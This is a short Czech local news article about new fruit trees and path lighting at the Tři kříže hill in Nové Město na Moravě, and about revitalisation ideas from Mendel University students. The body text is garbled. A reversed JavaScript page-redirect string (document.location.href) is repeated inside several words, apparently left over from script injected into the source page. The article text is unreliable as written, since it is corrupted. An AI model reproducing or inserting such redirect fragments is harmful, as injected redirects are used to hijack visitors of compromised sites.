Rainbow page separator

Kolem cesty na kopec přibudou nové stromy a osvětlení

Pondělí, 19. června 2017

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / V první řadě nové stromy přibudou v lokalitě Tři kříže, kterou v dalších letech čeká revitalizace. Výsadba se zatím týká prázdných oplocenek podél cesty od evangelického hřbi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tova, mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to smrků v nich ale poros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou třešně a jabloně. Novinkou se rovněž stane nové osvětlení, které olemuje přístupovou cestu do lokality, a není vyloučeno, že později bude prodlouženo až na kopec ke Třem křížům.
V projektu revitalizace je počítáno rovněž s využitím některých návrhů na zatraktivnění oblíbené novoměstské odpočinkové lokality, které vypracovali studenti z brněnské Mendelovy univerzity. Ti navrhli kupříkladu i propojení širšího okolí výletního místa u Třech křížů na kopci Kaplisko sítí cyklostezek, pěších cest i stezek pro koně. Využity by při[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom byly zajímavé krajinné body pro zastávky, aby vznikl atraktivní turistický okruh kolem Nového Města se zachováním původního krajinného rázu oblasti, jako jsou květnaté louky či remízky.